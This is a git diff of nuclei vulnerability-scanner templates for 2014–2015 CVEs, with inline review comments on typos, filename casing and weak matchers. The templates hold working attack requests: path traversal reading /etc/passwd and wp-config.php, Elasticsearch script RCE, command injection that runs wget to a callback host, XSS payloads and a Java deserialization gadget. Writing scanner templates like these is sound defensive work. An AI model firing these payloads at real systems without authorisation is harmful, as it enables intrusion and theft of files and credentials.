+ name: Belkin N150 Router 1.00.08/1.00.09 - Path Traversal
+ author: daffainfo
+ severity: high
+ description: A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.
+ reference:
+ - https://www.kb.cert.org/vuls/id/774788
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-2962l
+ - http://www.kb.cert.org/vuls/id/774788
+ - http://www.belkin.com/us/support-article?articleNum=109400
+ remediation: Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources.
+ classification:
+ cve-id: CVE-2014-2962
+ tags: cve,cve2014,lfi,router,firmware,traversal
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/23
diff --git a/nuclei-templates/CVE-2014/cve-2014-3120.yaml b/nuclei-templates/CVE-2014/cve-2014-3120.yaml
new file mode 100644
index 0000000000..437057bc90
--- /dev/null
+++ b/nuclei-templates/CVE-2014/cve-2014-3120.yaml
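Review bot: The second entry under `reference` ends in `CVE-2014-2962l`, with a stray trailing `l`, so the NVD link does not resolve to the CVE record; it should be `- https://nvd.nist.gov/vuln/detail/CVE-2014-2962`. The `name` lists firmware 1.00.08/1.00.09 while the description says firmware before 1.00.08, which is worth reconciling in the same edit so the affected range is unambiguous. The regex matcher also has no `part: body`, unlike the sibling templates in this commit.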
@@ -0,0 +1,60 @@
+id: CVE-2014-3120
+
+info:
+ name: ElasticSearch v1.1.1/1.2 RCE
+ author: pikpikcu
+ severity: critical
+ description: |
+ The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. Be aware this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine.
+ reference:
+ - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120
+ - https://www.elastic.co/blog/logstash-1-4-3-released
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-3120
+ - http://bouk.co/blog/elasticsearch-rce/
+ classification:
+ cve-id: CVE-2014-3120
+ tags: cve,cve2014,elastic,rce,elasticsearch
+
+requests:
+ - raw:
+ - |
+ POST /_search?pretty HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ Accept-Language: en
+ Content-Type: application/x-www-form-urlencoded
+
+ {
+ "size": 1,
+ "query": {
+ "filtered": {
+ "query": {
+ "match_all": {
+ }
+ }
+ }
+ },
+ "script_fields": {
+ "command": {
+ "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream()).useDelimiter(\"\\\\A\").next();"
+ }
+ }
+ }
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "application/json"
+ part: header
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ part: body
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/24
diff --git a/nuclei-templates/CVE-2014/cve-2014-3206.yaml b/nuclei-templates/CVE-2014/cve-2014-3206.yaml
new file mode 100644
index 0000000000..93e697d674
--- /dev/null
+++ b/nuclei-templates/CVE-2014/cve-2014-3206.yaml
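Review bot: This file is essentially the template that the commit deletes as `CVE-2014-3120.yaml`, re-added under the lower-case name `cve-2014-3120.yaml`, while other files in the same commit are renamed the opposite way (for example `cve-2014-4592.yaml` to `CVE-2014-4592.yaml`). Paths that differ only in case collide on case-insensitive checkouts and turn a rename into a delete plus add, which hides the real content change from review. The updater should settle on one casing and move files with a rename instead. The same applies to the cve-2014-3206, cve-2014-4535, cve-2014-8799 and cve-2014-9608 files added later in this commit.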
@@ -0,0 +1,38 @@
+id: CVE-2014-3206
+
+info:
+ name: Seagate BlackArmor NAS - Command Injection
+ author: gy741
+ severity: critical
+ description: Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-3206
+ - https://www.exploit-db.com/exploits/33159
+ - https://www.exploit-db.com/exploits/33159/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2014-3206
+ cwe-id: CWE-20
+ tags: cve,cve2014,seagate,rce
+
+requests:
+ - raw:
+ - |
+ GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+
+ - |
+ GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+
+ unsafe: true
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "http"
+
+# Enhanced by mp on 2022/02/24
diff --git a/nuclei-templates/CVE-2014/cve-2014-4535.yaml b/nuclei-templates/CVE-2014/cve-2014-4535.yaml
new file mode 100644
index 0000000000..23d27ce4bf
--- /dev/null
+++ b/nuclei-templates/CVE-2014/cve-2014-4535.yaml
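Review bot: The description gives the second endpoint as `localhost/backupmgmt/pre_connect_check.php`, but the second raw request goes to `/backupmgt/pre_connect_check.php`, so the directory is spelled two ways and one of them is wrong. If the request path is the incorrect one, that half of the check can never fire and the device would be reported clean on it; the path should be verified against the referenced advisory and the two made to agree. The new copy also drops the `edb` tag that the removed upper-case copy had, although both exploit-db references are still listed; I would restore it as `tags: cve,cve2014,seagate,rce,edb`.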
@@ -0,0 +1,40 @@
+id: CVE-2014-4535
+
+info:
+ name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting
+ author: daffainfo
+ severity: medium
+ description: A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.
+ reference:
+ - https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-4535
+ - http://codevigilant.com/disclosure/wp-plugin-import-legacy-media-a3-cross-site-scripting-xss
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2014-4535
+ cwe-id: CWE-79
+ tags: cve,cve2014,wordpress,wp-plugin,xss
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "'>"
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/24
diff --git a/nuclei-templates/CVE-2014/cve-2014-4942.yaml b/nuclei-templates/CVE-2014/cve-2014-4942.yaml
deleted file mode 100644
index f3a59d9039..0000000000
--- a/nuclei-templates/CVE-2014/cve-2014-4942.yaml
+++ /dev/null
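Review bot: The body matcher under `matchers:` is the two-character word `"'>"`, which together with the `text/html` header and status 200 checks would match a large share of ordinary pages and report reflected XSS where nothing was reflected. This page may have lost markup from that string, but if the file really contains it, the word should be the full decoded marker that the request sends in `filename=`, so that a match proves the value came back unescaped. The same applies to cve-2014-9608.yaml later in this commit, where the body word is the empty string `''`.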
@@ -1,45 +0,0 @@ -id: CVE-2014-4942 - -info: - name: WordPress EasyCart <2.0.6 - Information Disclosure - author: DhiyaneshDk - severity: low - description: | - WordPress EasyCart plugin before 2.0.6 contains an information disclosure vulnerability. An attacker can obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function. - reference: - - https://wpscan.com/vulnerability/64ea4135-eb26-4dea-a13f-f4c1deb77150 - - https://codevigilant.com/disclosure/wp-plugin-wp-easycart-information-disclosure - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4942 - - https://nvd.nist.gov/vuln/detail/CVE-2014-4942 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cve-id: CVE-2014-4942 - cwe-id: CWE-200 - tags: wpscan,cve,cve2014,wordpress,wp-plugin,wp,phpinfo,disclosure - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/wp-easycart/inc/admin/phpinfo.php" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "PHP Extension" - - "PHP Version" - condition: and - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - '>PHP Version <\/td>([0-9.]+)' - -# Enhanced by mp on 2022/09/30 diff --git a/nuclei-templates/CVE-2014/CVE-2014-8682.yaml b/nuclei-templates/CVE-2014/cve-2014-8682.yaml similarity index 100% rename from nuclei-templates/CVE-2014/CVE-2014-8682.yaml rename to nuclei-templates/CVE-2014/cve-2014-8682.yaml diff --git a/nuclei-templates/CVE-2014/cve-2014-8799.yaml b/nuclei-templates/CVE-2014/cve-2014-8799.yaml new file mode 100644 index 0000000000..b462c7325c --- /dev/null +++ b/nuclei-templates/CVE-2014/cve-2014-8799.yaml 
@@ -0,0 +1,37 @@
+id: CVE-2014-8799
+
+info:
+ name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-8799
+ - https://www.exploit-db.com/exploits/35346
+ - https://www.cvedetails.com/cve/CVE-2014-8799
+ - https://wordpress.org/plugins/dukapress/changelog/
+ classification:
+ cve-id: CVE-2014-8799
+ tags: cve,cve2014,wordpress,wp-plugin,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "DB_NAME"
+ - "DB_PASSWORD"
+ - "DB_USER"
+ - "DB_HOST"
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/25
diff --git a/nuclei-templates/CVE-2014/cve-2014-9608.yaml b/nuclei-templates/CVE-2014/cve-2014-9608.yaml
new file mode 100644
index 0000000000..ecb6d6688a
--- /dev/null
+++ b/nuclei-templates/CVE-2014/cve-2014-9608.yaml
@@ -0,0 +1,40 @@
+id: CVE-2014-9608
+
+info:
+ name: Netsweeper 4.0.3 - Cross-Site Scripting
+ author: daffainfo
+ severity: medium
+ description: A cross-site scripting vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
+ reference:
+ - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-9608
+ - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2014-9608
+ cwe-id: CWE-79
+ tags: cve,cve2014,netsweeper,xss
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/webadmin/policy/group_table_ajax.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ''
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/25
diff --git a/nuclei-templates/CVE-2015/cve-2015-0554.yaml b/nuclei-templates/CVE-2015/CVE-2015-0554.yaml
similarity index 100%
rename from nuclei-templates/CVE-2015/cve-2015-0554.yaml
rename to nuclei-templates/CVE-2015/CVE-2015-0554.yaml
diff --git a/nuclei-templates/CVE-2015/CVE-2015-1000012.yaml b/nuclei-templates/CVE-2015/CVE-2015-1000012.yaml
deleted file mode 100644
index 0dd86c0884..0000000000
--- a/nuclei-templates/CVE-2015/CVE-2015-1000012.yaml
+++ /dev/null
@@ -1,36 +0,0 @@ -id: CVE-2015-1000012 - -info: - name: WordPress MyPixs <=0.3 - Local File Inclusion - author: daffainfo - severity: high - description: WordPress MyPixs 0.3 and prior contains a local file inclusion vulnerability. - reference: - - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 - - http://www.vapidlabs.com/advisory.php?v=154 - - https://nvd.nist.gov/vuln/detail/CVE-2015-1000012 - - http://web.archive.org/web/20210518144916/https://www.securityfocus.com/bid/94495 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2015-1000012 - cwe-id: CWE-200 - tags: cve,cve2015,wordpress,wp-plugin,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - part: body - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/06 diff --git a/nuclei-templates/CVE-2015/cve-2015-1880.yaml b/nuclei-templates/CVE-2015/CVE-2015-1880.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-1880.yaml rename to nuclei-templates/CVE-2015/CVE-2015-1880.yaml diff --git a/nuclei-templates/CVE-2015/CVE-2015-2067.yaml b/nuclei-templates/CVE-2015/CVE-2015-2067.yaml deleted file mode 100644 index 192dee2d59..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-2067.yaml +++ /dev/null 
@@ -1,34 +0,0 @@ -id: CVE-2015-2067 - -info: - name: Magento Server MAGMI - Directory Traversal - author: daffainfo - severity: high - description: Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. - reference: - - https://www.exploit-db.com/exploits/35996 - - https://nvd.nist.gov/vuln/detail/CVE-2015-2067 - - http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html - classification: - cve-id: CVE-2015-2067 - metadata: - shodan-query: http.component:"Magento" - tags: cve,cve2015,lfi,magento,magmi,plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/08 diff --git a/nuclei-templates/CVE-2015/cve-2015-2068.yaml b/nuclei-templates/CVE-2015/CVE-2015-2068.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-2068.yaml rename to nuclei-templates/CVE-2015/CVE-2015-2068.yaml diff --git a/nuclei-templates/CVE-2015/CVE-2015-3224.yaml b/nuclei-templates/CVE-2015/CVE-2015-3224.yaml deleted file mode 100644 index 157fd2451d..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-3224.yaml +++ /dev/null 
@@ -1,38 +0,0 @@ -id: CVE-2015-3224 -info: - name: Ruby on Rails Web Console - Remote Code Execution - author: pdteam - severity: critical - description: Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb. - reference: - - https://www.metahackers.pro/rails-web-console-v2-whitelist-bypass-code-exec/ - - https://www.jomar.fr/posts/2022/basic_recon_to_rce_ii/ - - https://hackerone.com/reports/44513 - - https://nvd.nist.gov/vuln/detail/CVE-2015-3224 - classification: - cve-id: CVE-2015-3224 - tags: cve,cve2015,rce,rails,ruby -requests: - - method: GET - path: - - "{{BaseURL}}/{{randstr}}" - headers: - X-Forwarded-For: ::1 - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Rails.root:" - - "Action Controller: Exception caught" - condition: and - - type: word - part: response - words: - - "X-Web-Console-Session-Id" - - "data-remote-path=" - - "data-session-id=" - case-insensitive: true - condition: or - -# Enhanced by mp on 2022/05/10 diff --git a/nuclei-templates/CVE-2015/CVE-2015-3337.yaml b/nuclei-templates/CVE-2015/CVE-2015-3337.yaml deleted file mode 100644 index 6a683cf9f6..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-3337.yaml +++ /dev/null 
@@ -1,34 +0,0 @@ -id: CVE-2015-3337 - -info: - name: Elasticsearch - Local File Inclusion - author: pdteam - severity: high - description: Elasticsearch before 1.4.5 and 1.5.x before 1.5.2 allows remote attackers to read arbitrary files via unspecified vectors when a site plugin is enabled. - reference: - - https://www.exploit-db.com/exploits/37054/ - - http://web.archive.org/web/20210121084446/https://www.securityfocus.com/archive/1/535385 - - https://www.elastic.co/community/security - - http://www.debian.org/security/2015/dsa-3241 - - https://nvd.nist.gov/vuln/detail/CVE-2015-3337 - classification: - cve-id: CVE-2015-3337 - tags: edb,cve,cve2015,elastic,lfi,elasticsearch,plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - part: body - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/08 diff --git a/nuclei-templates/CVE-2015/cve-2015-3897.yaml b/nuclei-templates/CVE-2015/CVE-2015-3897.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-3897.yaml rename to nuclei-templates/CVE-2015/CVE-2015-3897.yaml diff --git a/nuclei-templates/CVE-2015/cve-2015-4414.yaml b/nuclei-templates/CVE-2015/CVE-2015-4414.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-4414.yaml rename to nuclei-templates/CVE-2015/CVE-2015-4414.yaml diff --git a/nuclei-templates/CVE-2015/cve-2015-5461.yaml b/nuclei-templates/CVE-2015/CVE-2015-5461.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-5461.yaml rename to nuclei-templates/CVE-2015/CVE-2015-5461.yaml diff --git a/nuclei-templates/CVE-2015/CVE-2015-5471.yaml b/nuclei-templates/CVE-2015/CVE-2015-5471.yaml deleted file mode 100644 index 4c6adff168..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-5471.yaml +++ /dev/null 
@@ -1,23 +0,0 @@ -id: CVE-2015-5471 -info: - name: Swim Team <= v1.44.10777 - Local File Inclusion - author: 0x_Akoko - severity: high - reference: https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568 - tags: wordpress,plugin,wp,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2015/CVE-2015-6544.yaml b/nuclei-templates/CVE-2015/CVE-2015-6544.yaml deleted file mode 100644 index 61f14ea40b..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-6544.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2015-6544 - -info: - name: Combodo iTop <2.2.0-2459 - Cross-Site Scripting - author: pikpikcu - severity: medium - description: | - Combodo iTop before 2.2.0-2459 contains a cross-site scripting vulnerability in application/dashboard.class.inc.php which allows remote attackers to inject arbitrary web script or HTML via a dashboard title. - reference: - - https://www.htbridge.com/advisory/HTB23268 - - http://sourceforge.net/p/itop/tickets/1114/ - - http://sourceforge.net/p/itop/code/3662/ - - https://nvd.nist.gov/vuln/detail/CVE-2015-6544 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2015-6544 - cwe-id: CWE-79 - tags: cve,cve2015,xss,itop - -requests: - - method: GET - path: - - "{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - - type: status - status: - - 200 - - - type: word - part: header - words: - - text/html - -# Enhanced by mp on 2022/08/12 
diff --git a/nuclei-templates/CVE-2015/CVE-2015-7377.yaml b/nuclei-templates/CVE-2015/CVE-2015-7377.yaml deleted file mode 100644 index 5885cbdcdc..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-7377.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2015-7377 - -info: - name: Pie-Register <= 2.0.18 - Unauthenticated Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: "Cross-site scripting (XSS) vulnerability in pie-register/pie-register.php in the Pie Register plugin before 2.0.19 for WordPress allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URI." - reference: - - https://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html - - https://nvd.nist.gov/vuln/detail/CVE-2015-7377 - classification: - cve-id: CVE-2015-7377 - tags: cve,cve2015,wordpress,wp-plugin,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2015/CVE-2015-7450.yaml b/nuclei-templates/CVE-2015/CVE-2015-7450.yaml deleted file mode 100644 index feebde88db..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-7450.yaml +++ /dev/null 
@@ -1,61 +0,0 @@ -id: CVE-2015-7450 - -info: - name: IBM WebSphere Java Object Deserialization - Remote Code Execution - author: wdahlenb - severity: critical - description: IBM Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default). - reference: - - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py - - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ - - https://nvd.nist.gov/vuln/detail/CVE-2015-7450 - - http://www-01.ibm.com/support/docview.wss?uid=swg21972799 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2015-7450 - cwe-id: CWE-94 - metadata: - shodan-query: http.html:"IBM WebSphere Portal" - tags: cve,cve2015,websphere,deserialization,rce,oast,ibm,java,kev - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/xml; charset=utf-8 - SOAPAction: "urn:AdminService" - - - - - - - - rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA== - getUnsavedChanges - {{ generate_java_gadget("dns", "{{interactsh-url}}", "base64-raw")}} - rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24= - - - - - matchers-condition: and - matchers: - - type: status - status: - - 500 - - - type: word - words: - - 'SOAP-ENV:Server' - - '' - condition: and - - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - "dns" - -# Enhanced by mp on 2022/05/10 
diff --git a/nuclei-templates/CVE-2015/CVE-2015-7823.yaml b/nuclei-templates/CVE-2015/CVE-2015-7823.yaml deleted file mode 100644 index dcfd90e56a..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-7823.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2015-7823 - -info: - name: Kentico CMS 8.2 - Open Redirect - author: 0x_Akoko - severity: low - description: Kentico CMS 8.2 contains an open redirect vulnerability via GetDocLink.ashx with link variable. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain. - reference: - - https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html - - https://nvd.nist.gov/vuln/detail/CVE-2015-7823 - - http://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html - classification: - cve-id: CVE-2015-7823 - tags: cve,cve2015,kentico,redirect,packetstorm - -requests: - - method: GET - path: - - "{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://interact.sh/" - - matchers: - - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - part: header - -# Enhanced by mp on 2022/09/30 diff --git a/nuclei-templates/CVE-2015/cve-2015-8349.yaml b/nuclei-templates/CVE-2015/CVE-2015-8349.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-8349.yaml rename to nuclei-templates/CVE-2015/CVE-2015-8349.yaml diff --git a/nuclei-templates/CVE-2015/CVE-2015-8399.yaml b/nuclei-templates/CVE-2015/CVE-2015-8399.yaml deleted file mode 100644 index ff2bee94b7..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-8399.yaml +++ /dev/null 
@@ -1,40 +0,0 @@ -id: CVE-2015-8399 - -info: - name: Atlassian Confluence <5.8.17 - Information Disclosure - author: princechaddha - severity: medium - description: Atlassian Confluence before 5.8.17 contains an information disclsoure vulnerability. A remote authenticated user can read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action. - reference: - - https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro - - https://www.exploit-db.com/exploits/39170/ - - http://web.archive.org/web/20201209041130/https://www.securityfocus.com/archive/1/537232/100/0/threaded - - https://nvd.nist.gov/vuln/detail/CVE-2015-8399 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N - cvss-score: 4.3 - cve-id: CVE-2015-8399 - cwe-id: CWE-200 - metadata: - shodan-query: http.component:"Atlassian Confluence" - tags: edb,cve,cve2015,atlassian,confluence - -requests: - - method: GET - path: - - "{{BaseURL}}/spaces/viewdefaultdecorator.action?decoratorName" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - "confluence-init.properties" - - "View Default Decorator" - condition: and - -# Enhanced by mp on 2022/09/30 diff --git a/nuclei-templates/CVE-2015/cve-2015-8813.yaml b/nuclei-templates/CVE-2015/CVE-2015-8813.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-8813.yaml rename to nuclei-templates/CVE-2015/CVE-2015-8813.yaml diff --git a/nuclei-templates/CVE-2015/cve-2015-9414.yaml b/nuclei-templates/CVE-2015/CVE-2015-9414.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-9414.yaml rename to nuclei-templates/CVE-2015/CVE-2015-9414.yaml diff --git a/nuclei-templates/CVE-2015/cve-2015-1000012.yaml b/nuclei-templates/CVE-2015/cve-2015-1000012.yaml new file mode 100644 index 0000000000..5b40f010c9 --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-1000012.yaml 
@@ -0,0 +1,33 @@
+id: CVE-2015-1000012
+
+info:
+ name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)
+ author: daffainfo
+ severity: high
+ description: Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin
+ reference:
+ - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
+ - http://www.vapidlabs.com/advisory.php?v=154
+ - http://www.securityfocus.com/bid/94495
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2015-1000012
+ cwe-id: CWE-200
+ tags: cve,cve2015,wordpress,wp-plugin,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ part: body
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2015/cve-2015-2067.yaml b/nuclei-templates/CVE-2015/cve-2015-2067.yaml
